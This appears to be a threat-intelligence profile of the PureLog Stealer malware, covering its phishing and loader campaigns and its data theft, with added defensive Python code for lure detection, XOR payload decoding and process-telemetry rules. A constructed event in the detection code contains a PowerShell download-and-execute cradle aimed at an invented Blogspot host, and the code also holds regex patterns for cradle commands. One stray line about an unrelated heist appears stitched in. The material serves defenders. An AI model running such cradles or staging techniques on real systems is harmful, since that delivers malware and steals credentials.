PureLog Stealer is an information-stealing malware family delivered in multiple phishing and loader-driven campaigns. Public reporting describes it as a low-cost, easy-to-use infostealer that steals saved browser passwords, cookies, autofill data, browsing history, browser extension data, cryptocurrency wallet information, screenshots, and general system details such as hostname, username, and installed antivirus products. It has been observed establishing persistence through the registry, including a Run-key value named SystemSettings under HKCU (reported as HKCU\Run\SystemSettings), and exfiltrating collected data over HTTPS to command-and-control infrastructure.
Observed delivery methods include fake copyright-violation phishing notices, ClickFix/fake-CAPTCHA social-engineering lures, and multi-stage commodity loader campaigns. In one campaign reported by Trend Micro, organizations in healthcare, government, education, and hospitality were targeted, primarily in Germany and Canada, with additional victims in the United States and Australia. That infection chain used localized phishing emails, compressed archives, a renamed legitimate tool such as WinRAR, a renamed Python interpreter, an AMSI bypass, anti-VM and anti-analysis checks, remote retrieval of decryption keys, two chained .NET loaders, and direct in-memory execution of the final payload. Another campaign documented by Securonix, named Veil#Drop, abused Google Blogspot pages, PowerShell, Windows Script Host, and trusted Microsoft-signed binaries (InstallUtil, MSBuild, RegSvcs, and the C# compiler) to stage and reflectively load PureLog Stealer while minimizing on-disk artifacts. Lure and staging artifacts in that campaign included transcript.pdf.js, phud.dudus.docx.pdf.olp.sys, niple.docx.odp.pdf.sys, and Blogspot infrastructure such as htlwub00klocate[.]blogspot[.]com and cpyzaramay26[.]blogspot[.]com.
PureLog Stealer also appeared as a final payload in sophisticated commodity-loader activity targeting manufacturing and government organizations in Italy, Finland, and Saudi Arabia. In that reporting, infection vectors included weaponized Office documents exploiting CVE-2017-11882, malicious SVG files, ZIP archives with LNK shortcuts, and RAR archives containing obfuscated JavaScript. Subsequent stages used hidden PowerShell, steganographically embedded payloads retrieved from Archive.org, reflective .NET loading, a trojanized TaskScheduler library, and process injection or hollowing into RegAsm.exe. In those campaigns, the PureLog payload was decrypted with Triple DES in CBC mode, with GZip decompression also reported, before exfiltrating browser credentials, cryptocurrency wallet data, and system information.
The malware is also referenced in ClickFix-related activity where victims are tricked into manually executing malicious PowerShell or Run-dialog commands copied from fake CAPTCHA pages; in at least one Swiss-targeting campaign, researchers assessed the delivered payload was likely AsyncRAT or PureLog Stealer based on observed command-and-control traffic. Across public reporting, PureLog Stealer is associated with financially motivated activity and was also listed in finance-sector incident reporting.
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Once opened, the file runs through Windows Script Host and immediately launches PowerShell with its usual script-execution safeguards disabled. From there, PowerShell reaches out to attacker-controlled Blogspot pages to fetch the next stages, without saving a suspicious file to disk.
PowerShell then uses a download cradle, fetching code directly from a Blogspot page and running it from memory. Nothing is written to the hard drive at this stage, so many file-scanning tools never inspect it.
Once the victim executes the malicious lure, a command interpreter launches silently in the background.
The extracted content includes a renamed Python interpreter called svchost.exe and a heavily obfuscated Python script named instructions.pdf.
The file niple.docx.odp.pdf.sys carries two large blocks of encoded numeric data, which decode into working .NET programs.
A file named transcript.pdf.js looks like an ordinary PDF at first glance, but Windows treats it very differently behind the scenes. Since Windows often hides file extensions by default, victims see only transcript.pdf and have little reason to suspect anything is wrong.
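The double-extension trick above is easy to check for mechanically. The following is an added example, not code from the Securonix reporting or any of the cited vendors: it parses file names, works out what Explorer would display with extensions hidden versus what Windows actually dispatches on, and flags the mismatch. Which extensions count as "runs on double-click" and which "look like a document" are this example's own assumptions.

```python
# Added example, not code from the original reporting: flag lure file names that
# hide the extension Windows actually dispatches on behind document-looking
# ones, as with transcript.pdf.js above. The two extension sets are assumptions.
from dataclasses import dataclass
from typing import List

# Extensions Explorer hands to a script host or runs directly (assumed list).
EXECUTABLE_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                   ".lnk", ".exe", ".scr", ".pif", ".bat", ".cmd", ".ps1"}
# Extensions a victim reads as a harmless document (assumed list).
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".odp", ".odt", ".xls", ".xlsx", ".txt"}


@dataclass
class Verdict:
    name: str
    displayed_as: str   # what Explorer shows with "Hide extensions for known file types" on
    real_ext: str       # the last extension, the only one Windows dispatches on
    suspicious: bool
    reason: str


def analyse_name(name: str) -> Verdict:
    parts = name.split(".")
    if len(parts) < 2:
        return Verdict(name, name, "", False, "no extension")
    real_ext = "." + parts[-1].lower()
    displayed = ".".join(parts[:-1])          # Explorer hides only the final extension
    inner = {"." + p.lower() for p in parts[1:-1]}
    if real_ext in EXECUTABLE_EXTS and inner & DOCUMENT_EXTS:
        return Verdict(name, displayed, real_ext, True,
                       f"executable extension {real_ext} hidden behind {sorted(inner & DOCUMENT_EXTS)}")
    if inner & DOCUMENT_EXTS and real_ext not in DOCUMENT_EXTS:
        return Verdict(name, displayed, real_ext, True,
                       f"document extensions stacked under non-document extension {real_ext}")
    return Verdict(name, displayed, real_ext, False, "ordinary name")


def scan(names: List[str]) -> List[Verdict]:
    """Return only the verdicts worth an analyst's attention."""
    return [v for v in (analyse_name(n) for n in names) if v.suspicious]


# Names taken from the reporting above, plus one constructed benign control
# (quarterly_report.pdf). instructions.pdf is the renamed Python script from
# the Trend Micro chain: a name check alone cannot catch it.
SAMPLE_NAMES = ["transcript.pdf.js", "phud.dudus.docx.pdf.olp.sys",
                "niple.docx.odp.pdf.sys", "quarterly_report.pdf", "instructions.pdf"]

if __name__ == "__main__":
    for v in scan(SAMPLE_NAMES):
        print(f"{v.name}: shown as '{v.displayed_as}', runs as {v.real_ext}: {v.reason}")
```

The limitation is worth stating: a name check catches files that depend on Explorer's dispatch (transcript.pdf.js) and the stacked-extension staging files, but not instructions.pdf from the other campaign, which is a Python script run by a renamed interpreter and never needs a script extension. Pair name rules with content checks (magic bytes versus extension) in the mail gateway or EDR.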
This sets up the final deployment of the PureLog payload, which is executed directly in memory, again leaving few artifacts on disk.
The retrieved file, named phud.dudus.docx.pdf.olp.sys, deletes the original JavaScript launcher to erase evidence.
It also decrypts a hidden payload using a repeating XOR key.
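Together, the two staging steps above (a .NET image stored as numeric data, protected by a repeating XOR key) are a common analyst task: pull the numbers out of the script, recover the key, and confirm the result is a PE. The following is an added example, not code from the original reporting. The real samples' key, key length and exact encoding are not on the page, so the blob is constructed here, and the key is recovered by a known-plaintext attack on the standard DOS header that every Microsoft-linked PE starts with.

```python
# Added example, not code from the original reporting: recover an embedded .NET
# binary from a block of encoded numeric data protected by a repeating XOR key.
# The sample blob and key below are constructed; nothing here is taken from the
# real samples beyond the two behaviours the reporting describes.
import re
import struct
from typing import Optional, Tuple

# First 16 bytes of the DOS header emitted by Microsoft linkers and csc:
# "MZ", e_cblp=0x90, e_cp=3, e_crlc=0, e_cparhdr=4, e_minalloc=0, e_maxalloc=0xFFFF.
DOS_HEADER_PREFIX = bytes.fromhex("4d5a90000300000004000000ffff0000")


def parse_numeric_block(text: str) -> bytes:
    """Turn '77,90,144,...' (any separator) into raw bytes; refuse non-byte values."""
    values = [int(n) for n in re.findall(r"\d+", text)]
    if any(v > 255 for v in values):
        raise ValueError("numeric block contains values outside 0..255")
    return bytes(values)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(blob: bytes) -> bool:
    """MZ magic plus a PE\\0\\0 signature at e_lfanew (the DWORD at offset 0x3C)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return e_lfanew + 4 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_xor_key(encoded: bytes, max_key_len: int = 16) -> Optional[bytes]:
    """Known-plaintext attack: derive candidate key bytes from the DOS header
    prefix and keep the shortest length whose key reproduces the whole prefix
    and yields a structurally valid PE. Keys longer than 16 bytes need more
    known plaintext (e.g. the DOS stub) and are out of scope here."""
    if len(encoded) < len(DOS_HEADER_PREFIX):
        return None
    for key_len in range(1, max_key_len + 1):
        key = bytes(encoded[i] ^ DOS_HEADER_PREFIX[i] for i in range(key_len))
        trial = xor_repeating(encoded[:len(DOS_HEADER_PREFIX)], key)
        if trial == DOS_HEADER_PREFIX and looks_like_pe(xor_repeating(encoded, key)):
            return key
    return None


def decode_block(text: str, key: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Parse the numeric block, recover (or use) the key, return (key, decoded image)."""
    encoded = parse_numeric_block(text)
    key = key or recover_xor_key(encoded)
    if key is None:
        raise ValueError("could not recover a key from the DOS header")
    decoded = xor_repeating(encoded, key)
    if not looks_like_pe(decoded):
        raise ValueError("decoded data is not a PE image")
    return key, decoded


def build_sample_image() -> bytes:
    """Constructed stand-in for a tiny .NET assembly: standard DOS header,
    e_lfanew=0x40, PE signature, then filler where the real headers would be."""
    dos = bytearray(0x40)
    dos[:16] = DOS_HEADER_PREFIX
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\0\0" + bytes(range(64))


SAMPLE_KEY = b"Pure"   # constructed for this example; the real key is not on the page
SAMPLE_BLOCK = ",".join(str(b) for b in xor_repeating(build_sample_image(), SAMPLE_KEY))

if __name__ == "__main__":
    key, image = decode_block(SAMPLE_BLOCK)
    print(f"recovered key={key!r}, image={len(image)} bytes, pe={looks_like_pe(image)}")
```

On a real sample, write the decoded image out and confirm it is managed code (a CLR header in the data directories) before loading it in a .NET decompiler; if the key recovery fails, the loader may gzip or encrypt the image before XOR, as the other campaigns above do with GZip and Triple DES.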
If that approach fails, the malware falls back on trusted Microsoft-signed tools such as InstallUtil, MSBuild, RegSvcs, and the C# compiler (csc.exe), blending in with activity that security software usually ignores.
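The script-host-to-PowerShell cradle and the signed-binary fallback described above are both visible in process-creation telemetry. The following is an added example, not code or a rule from the original reporting: detection logic run over constructed events, flagging a script host that spawns a PowerShell download cradle (raised to high severity when the URL is on Blogspot) and any of the named .NET utilities launched from a script host or PowerShell, then walking the parent chain so the analyst sees the whole sequence. The Event schema, host names, paths and URL are invented for this example; map the fields to your EDR or Sysmon Event ID 1 columns.

```python
# Added example, not code from the original reporting: detection logic for the
# staging chain described above (script host -> PowerShell download cradle ->
# signed .NET utilities) over constructed process-creation events. The Event
# fields are this example's own schema; every path, host and URL is invented.
import re
from dataclasses import dataclass
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOTNET_LOLBINS = {"installutil.exe", "msbuild.exe", "regsvcs.exe", "regasm.exe", "csc.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell download-cradle and policy-bypass vocabulary.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"invoke-expression|\biex\b|-e(p|xecutionpolicy)\s+bypass|-enc(odedcommand)?\b",
    re.I)
BLOGSPOT = re.compile(r"https?://[\w.-]+\.blogspot\.com", re.I)


@dataclass
class Event:
    pid: int
    ppid: int
    image: str
    parent_image: str
    command_line: str


@dataclass
class Alert:
    pid: int
    severity: str
    reason: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(events: List[Event]) -> List[Alert]:
    alerts = []
    for e in events:
        img, parent, cl = basename(e.image), basename(e.parent_image), e.command_line
        if parent in SCRIPT_HOSTS and img in POWERSHELL and CRADLE.search(cl):
            sev = "high" if BLOGSPOT.search(cl) else "medium"
            alerts.append(Alert(e.pid, sev, f"{parent} spawned a PowerShell download cradle"))
        elif img in DOTNET_LOLBINS and parent in SCRIPT_HOSTS | POWERSHELL:
            # Build and installer tooling normally launches these; a script host
            # or a shell doing so matches the fallback path described above.
            alerts.append(Alert(e.pid, "high", f"{img} launched by {parent} (signed-binary staging)"))
    return alerts


def ancestry(events: List[Event], pid: int) -> List[str]:
    """Walk ppid links back to the root so the analyst sees the whole chain."""
    by_pid: Dict[int, Event] = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))


# Constructed telemetry: one Veil#Drop-style chain and two benign controls.
SAMPLE_EVENTS = [
    Event(100, 1, r"C:\Windows\explorer.exe", r"C:\Windows\System32\winlogon.exe", "explorer.exe"),
    Event(200, 100, r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe",
          r'wscript.exe "C:\Users\victim\Downloads\transcript.pdf.js"'),
    Event(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\System32\wscript.exe",
          "powershell.exe -ep bypass -w hidden -c \"IEX((New-Object Net.WebClient)"
          ".DownloadString('https://lure-host-example.blogspot.com/p/stage.html'))\""),
    Event(400, 300, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\victim\AppData\Local\Temp\s.dll"),
    Event(500, 100, r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
          r"C:\Windows\explorer.exe", "devenv.exe"),
    Event(600, 500, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
          r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "MSBuild.exe app.csproj"),
    Event(700, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\explorer.exe", "powershell.exe Get-Process"),
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a.severity}] pid {a.pid}: {a.reason}; chain: "
              f"{' -> '.join(ancestry(SAMPLE_EVENTS, a.pid))}")
```

The parent-process condition is what keeps the signed-binary rule quiet on developer and build hosts: MSBuild under devenv.exe is ignored, while the same binary under wscript.exe or powershell.exe is not. Because the chain is fileless, the command line and parent are often the only artifacts, so make sure command-line logging is enabled before relying on this.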
Incident volume peaked in the middle period (25 events, March 10 to April 10), driven by the USD 280 million Drift heist and a surge in phishing and credential-theft campaigns targeting US-based financial institutions.
PureLog Stealer harvests whatever valuable data it can find, including saved browser passwords, cookies, autofill entries, browsing history, and cryptocurrency wallet details.
The script also takes a full-screen screenshot, collects the machine hostname, username, and installed antivirus product names...
7 indicators attributed across vendor reports, sandbox runs, and researcher write-ups (IPs, domains, and DNS infrastructure linked to this family, plus other indicator types observed in public reporting).
8 sources tracked across advisories, community write-ups, and news.
An information stealer delivered through a multi-stage, memory-resident infection chain that abuses Blogspot, PowerShell, Windows Script Host, and trusted Microsoft utilities. It steals saved browser passwords, cookies, autofill data, browsing history, cryptocurrency wallet details, and basic system information.
A stealer delivered via copyright-themed phishing lures.
PureLog Stealer is an infostealer used in a phishing-driven campaign that harvests browser credentials, cryptocurrency wallet data, browser extension data, system information, screenshots, hostname, username, and installed antivirus details. In this campaign it is delivered through social engineering, decrypted and loaded in memory via .NET loaders, uses AMSI bypass techniques, and establishes registry persistence.
A low-cost infostealer delivered through a fileless phishing campaign. It executes in memory, establishes persistence via registry modifications, captures screenshots, profiles the system, and steals Chrome credentials, browser extensions, cryptocurrency wallets, and system information while using AMSI bypass, anti-VM, and obfuscation techniques to evade detection.